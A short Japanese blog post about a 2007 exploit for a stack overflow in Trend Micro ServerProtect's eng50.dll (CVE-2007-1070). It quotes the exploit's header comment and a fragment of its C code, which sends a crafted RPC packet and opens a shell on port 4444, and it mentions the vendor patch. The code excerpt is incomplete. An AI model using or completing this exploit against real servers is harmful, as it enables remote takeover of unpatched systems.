Trend Micro ServerProtect eng50.dll Stack Overflow Exploit

Server Protectの脆弱性をつくExploitが出ています。ShellPortが4444であくそうです。

 * Copyright (c) 2007 devcode
 *			^^ D E V C O D E ^^
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 * Hotfix/Patch:
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on DIDNT KNOW


	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;

2007/07/27にパッチが出ているspnt_558_win_en_securitypatch4.exe の対応みたいですね。